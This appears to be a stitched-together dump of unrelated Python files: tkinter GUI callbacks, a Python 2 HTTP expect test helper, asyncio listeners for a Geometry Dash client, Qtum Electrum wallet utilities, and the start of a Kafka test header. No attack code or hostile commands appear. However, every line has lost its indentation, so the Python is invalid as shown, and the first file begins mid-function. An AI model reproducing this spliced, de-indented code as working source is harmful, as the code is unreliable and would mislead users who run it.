sleep(1)
print('methodInAThread():', self.oop.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.oop.runT = Thread(target=self.oop.methodInAThread, args=[num])
self.oop.runT.setDaemon(True)
self.oop.runT.start()
print(self.oop.runT)
print('createThread():', self.oop.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.oop.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.oop.guiQueue.get()
print(qItem)
self.oop.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.oop.bookTitle.get()
page = self.oop.pageNumber.get()
quote = self.oop.quote.get(1.0, tk.END)
print(title)
print(quote)
self.oop.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.oop.mySQL.showBooks()
print(allBooks)
self.oop.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
# TZ Button callback
def allTimeZones(self):
for tz in all_timezones:
self.oop.scr.insert(tk.INSERT, tz + '\n')
# TZ Local Button callback
def localZone(self):
from tzlocal import get_localzone
self.oop.scr.delete('1.0', tk.END)
self.oop.scr.insert(tk.INSERT, get_localzone())
# Format local US time with TimeZone info
def getDateTime(self):
fmtStrZone = "%Y-%m-%d %H:%M:%S %Z%z"
# Get Coordinated Universal Time
utc = datetime.now(timezone('UTC'))
self.oop.log.writeToLog(utc.strftime(fmtStrZone),
self.oop.level.MINIMUM)
# Convert UTC datetime object to Los Angeles TimeZone
la = utc.astimezone(timezone('America/Los_Angeles'))
self.oop.log.writeToLog(la.strftime(fmtStrZone),
self.oop.level.NORMAL)
# Convert UTC datetime object to New York TimeZone
ny = utc.astimezone(timezone('America/New_York'))
self.oop.log.writeToLog(ny.strftime(fmtStrZone),
self.oop.level.DEBUG)
# update GUI label with NY Time and Zone
self.oop.lbl2.set(ny.strftime(fmtStrZone))
|
httpexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import httplib
CURDIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, CURDIR)
import uexpect
from threading import Thread, Event
from Queue import Queue, Empty
class IO(uexpect.IO):
def __init__(self, connection, response, queue, reader):
self.connection = connection
self.response = response
super(IO, self).__init__(None, None, queue, reader)
def write(self, data):
raise NotImplementedError
def close(self, force=True):
self.reader['kill_event'].set()
self.connection.close()
if self._logger:
self._logger.write('\n')
self._logger.flush()
def reader(response, queue, kill_event):
while True:
try:
if kill_event.is_set():
break
data = response.read(1)
queue.put(data)
except Exception, e:
if kill_event.is_set():
break
raise
def spawn(connection, request):
connection = httplib.HTTPConnection(**connection)
connection.request(**request)
response = connection.getresponse()
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(response, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(connection, response, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
if __name__ == '__main__':
with http({'host':'localhost','port':8123},{'method':'GET', 'url':'?query=SELECT%201'}) as client:
client.logger(sys.stdout)
client.timeout(2)
print client.response.status, client.response.reason
client.expect('1\n')
|
listener.py
|
import asyncio
import threading
import signal
import traceback
from gd.level import Level
from gd.logging import get_logger
from gd.typing import Client, Comment, FriendRequest, Iterable, List, Message, Optional, Union
from gd.utils import tasks
from gd.utils.async_utils import shutdown_loop, gather
from gd.utils.decorators import run_once
from gd.utils.filters import Filters
from gd.utils.text_tools import make_repr
__all__ = (
"AbstractListener",
"TimelyLevelListener",
"RateLevelListener",
"MessageOrRequestListener",
"LevelCommentListener",
"thread",
"get_loop",
"set_loop",
"run",
"differ",
"all_listeners",
)
loop = asyncio.new_event_loop()
log = get_logger(__name__)
all_listeners = []
def get_loop() -> asyncio.AbstractEventLoop:
return loop
def set_loop(new_loop: asyncio.AbstractEventLoop) -> None:
global loop
loop = new_loop
def run(loop: asyncio.AbstractEventLoop) -> None:
try:
loop.add_signal_handler(signal.SIGINT, loop.stop)
loop.add_signal_handler(signal.SIGTERM, loop.stop)
except (NotImplementedError, RuntimeError):
pass
asyncio.set_event_loop(loop)
try:
loop.run_forever()
except KeyboardInterrupt:
log.info("Received the signal to terminate the event loop.")
finally:
log.info("Cleaning up tasks.")
shutdown_loop(loop)
def update_thread_loop(thread: threading.Thread, loop: asyncio.AbstractEventLoop) -> None:
thread.args = (loop,)
thread = threading.Thread(target=run, args=(loop,), name="ListenerThread", daemon=True)
class AbstractListener:
def __init__(
self,
client: Client,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
if loop is None:
loop = get_loop()
self.client = client
self.loop = loop
self.runner = tasks.loop(seconds=delay, loop=loop)(self.main)
self.cache = None
all_listeners.append(self)
def __repr__(self) -> str:
info = {"client": self.client, "loop": self.loop}
return make_repr(self, info)
def attach_to_loop(self, loop: asyncio.AbstractEventLoop) -> None:
"""Attach the runner to another event loop."""
self.runner.loop = loop
self.loop = loop
def enable(self) -> None:
try:
self.runner.start()
except RuntimeError:
pass
@run_once
def close(self, *args, force: bool = True) -> None:
"""Accurately shutdown a listener.
If force is true, cancel the runner, and wait until it finishes otherwise.
"""
if force:
self.runner.cancel()
else:
self.runner.stop()
async def on_error(self, exc: Exception) -> None:
"""Basic event handler to print the errors if any occur."""
traceback.print_exc()
async def setup(self) -> None:
"""This function is used to do some preparations before starting listeners."""
pass
async def scan(self) -> None:
"""This function should contain main code of the listener."""
pass
async def main(self) -> None:
"""Main function, that is basically doing all the job."""
await self.setup()
try:
await self.scan()
except Exception as exc:
await self.on_error(exc)
class TimelyLevelListener(AbstractListener):
def __init__(
self,
client: Client,
t_type: str,
delay: int = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.method = getattr(client, "get_" + t_type)
self.call_method = "new_" + t_type
async def scan(self) -> None:
"""Scan for either daily or weekly levels."""
timely = await self.method()
if self.cache is None:
self.cache = timely
return
if timely.id != self.cache.id:
dispatcher = self.client.dispatch(self.call_method, timely)
self.loop.create_task(dispatcher) # schedule the execution
self.cache = timely
class RateLevelListener(AbstractListener):
def __init__(
self,
client: Client,
listen_to_rate: bool = True,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.client = client
self.call_method = "level_rated" if listen_to_rate else "level_unrated"
self.filters = Filters(strategy="awarded")
self.find_new = listen_to_rate
async def method(self, pages: int = 5) -> List[Level]:
return await self.client.search_levels(filters=self.filters, pages=range(pages))
async def scan(self) -> None:
new = await self.method()
if not new: # servers are probably broken, abort
return
if not self.cache:
self.cache = new
return
difference = differ(self.cache, new, self.find_new)
self.cache = new
for level in await further_differ(difference, self.find_new):
dispatcher = self.client.dispatch(self.call_method, level)
self.loop.create_task(dispatcher)
async def further_differ(array: Iterable[Level], find_new: bool = True) -> List[Level]:
array = list(array)
updated = await gather(level.refresh() for level in array)
final = list()
for level, new in zip(array, updated):
if find_new:
if new.is_rated() or new.has_coins_verified():
final.append(new)
else:
if new is None:
final.append(level)
elif not new.is_rated() and not new.has_coins_verified():
final.append(new)
return final
class MessageOrRequestListener(AbstractListener):
def __init__(
self,
client: Client,
listen_to_msg: bool = True,
delay: float = 5.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.client = client
self.to_call = "message" if listen_to_msg else "friend_request"
self.method = getattr(client, ("get_messages" if listen_to_msg else "get_friend_requests"))
async def call_method(self, pages: int = 10) -> Union[List[FriendRequest], List[Message]]:
return await self.method(pages=range(pages))
async def scan(self) -> None:
new = await self.call_method()
if not new:
return
if not self.cache:
self.cache = new
return
difference = list(differ(self.cache, new, True))
await gather(entity.read() for entity in difference)
self.cache = new
for entity in difference:
dispatcher = self.client.dispatch(self.to_call, entity)
self.loop.create_task(dispatcher)
class LevelCommentListener(AbstractListener):
def __init__(
self,
client: Client,
level_id: int,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.call_method = "level_comment"
self.level_id = level_id
async def load_level(self) -> None:
try:
self.level = await self.client.get_level(self.level_id, get_data=False)
except Exception:
self.level = Level(id=self.level_id, client=self.client)
async def method(self, amount: int = 1000) -> List[Comment]:
return await self.level.get_comments(amount=amount)
async def scan(self) -> None:
await self.load_level()
new = await self.method()
if not new:
return
if not self.cache:
self.cache = new
return
difference = differ(self.cache, new, True)
self.cache = new
for comment in difference:
dispatcher = self.client.dispatch(self.call_method, self.level, comment)
self.loop.create_task(dispatcher)
def differ(before: list, after: list, find_new: bool = True) -> filter:
# this could be improved a lot ~ nekit
if find_new:
for item in before:
# find a pivot
try:
after = after[: after.index(item)]
break
except ValueError: # not in list
pass
a, b = (before, after) if find_new else (after, before)
return filter(lambda elem: (elem not in a), b)
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import urllib.request, urllib.parse, urllib.error
import queue
import threading
import hmac
from struct import Struct
import webbrowser
import stat
from typing import NamedTuple, Optional
import inspect
from locale import localeconv
from .i18n import _
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'QTUM':8, 'mQTUM':5, 'uQTUM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
unpack_int32_from = Struct('<i').unpack_from
unpack_int64_from = Struct('<q').unpack_from
unpack_uint16_from = Struct('<H').unpack_from
unpack_uint32_from = Struct('<I').unpack_from
unpack_uint64_from = Struct('<Q').unpack_from
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class QtumException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class UserFacingException(Exception):
"""Exception that contains information intended to be shown to the user."""
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)' % self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return ''
def log_name(self):
msg = self.verbosity_filter or self.__class__.__name__
d = self.diagnostic_name()
if d: msg += "][" + d
return "[%s]" % msg
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error(self.log_name(), *msg)
def print_stderr(self, *msg):
print_stderr(self.log_name(), *msg)
def print_msg(self, *msg):
print_msg(self.log_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.qtum.qtum_electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/qtum_electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def standardize_path(path):
return os.path.normcase(os.path.realpath(os.path.abspath(path)))
def get_new_wallet_name(wallet_folder: str) -> str:
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
return filename
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc) -> str:
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8') -> bytes:
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return x.hex()
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".qtum-electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Qtum-Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Qtum-Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
# absolute path to python package folder of electrum ("lib")
pkg_dir = os.path.split(os.path.realpath(__file__))[0]
def resource_path(*parts):
return os.path.join(pkg_dir, *parts)
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
# format string
decimal_format = "." + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
# initial result
scale_factor = pow(10, decimal_point)
if not isinstance(x, Decimal):
x = Decimal(x).quantize(Decimal('1E-8'))
result = ("{:" + decimal_format + "f}").format(x / scale_factor)
if "." not in result: result += "."
result = result.rstrip('0')
# extra decimal places
integer_part, fract_part = result.split(".")
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + DECIMAL_POINT + fract_part
# leading/trailing whitespaces
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, *, num_zeros=0, precision=None):
if precision is None:
precision = FEERATE_PRECISION
num_zeros = min(num_zeros, FEERATE_PRECISION) # no more zeroes than available prec
return format_satoshis(fee, num_zeros=num_zeros, decimal_point=0, precision=precision)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
def block_explorer_info():
from . import constants
from .qtum import testnet_block_explorers, mainnet_block_explorers
if constants.net.TESTNET:
return testnet_block_explorers
else:
return mainnet_block_explorers
def block_explorer(config):
bbb = config.get('block_explorer', 'qtum.info')
return bbb
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, params):
"""
:param config:
:type params: dict
:return: str
"""
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
token = params.get('token')
addr = params.get('addr')
if token:
if 'qtum.org' in be_tuple[0]:
return "{}/token/{}?a={}".format(be_tuple[0], token, addr)
if 'qtum.info' in be_tuple[0]:
return "{}/address/{}/token-balance?tokens={}".format(be_tuple[0], addr, token)
url_parts = [be_tuple[0], ]
for k, v in params.items():
kind_str = be_tuple[1].get(k)
if not kind_str:
continue
url_parts.append(kind_str)
url_parts.append(v)
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a qtum address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'qtum':
raise Exception("Not a qtum URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid qtum address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_bip21_uri(addr, amount_sat: Optional[int], message: Optional[str],
*, extra_query_params: Optional[dict] = None) -> str:
from . import qtum
if not qtum.is_address(addr):
return ""
if extra_query_params is None:
extra_query_params = {}
query = []
if amount_sat:
query.append('amount=%s' % format_satoshis_plain(amount_sat))
if message:
query.append('message=%s' % urllib.parse.quote(message))
for k, v in extra_query_params.items():
if not isinstance(k, str) or k != urllib.parse.quote(k):
raise Exception(f"illegal key for URI: {repr(k)}")
v = urllib.parse.quote(v)
query.append(f"{k}={v}")
p = urllib.parse.ParseResult(scheme='qtum', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return str(urllib.parse.urlunparse(p))
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
# print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
# backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, file_name):
try:
with open(file_name, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def open_browser(url, new=0, autoraise=True):
return webbrowser.open(url, new, autoraise)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
class VerifiedTxInfo(NamedTuple):
height: int
timestamp: int
txpos: int
header_hash: str
def print_frames(depth=10):
print("--------------------")
for i in range(1, depth):
try:
frame = sys._getframe(i)
print(frame.f_code.co_name, frame.f_code.co_filename, frame.f_lineno)
except ValueError:
return
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
class TxMinedInfo(NamedTuple):
height: int # height of block that mined tx
conf: Optional[int] = None # number of confirmations (None means unknown)
timestamp: Optional[int] = None # timestamp of block that mined tx
txpos: Optional[int] = None # position of tx in serialized block
header_hash: Optional[str] = None # hash of block that mined tx
|
test_kafka.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
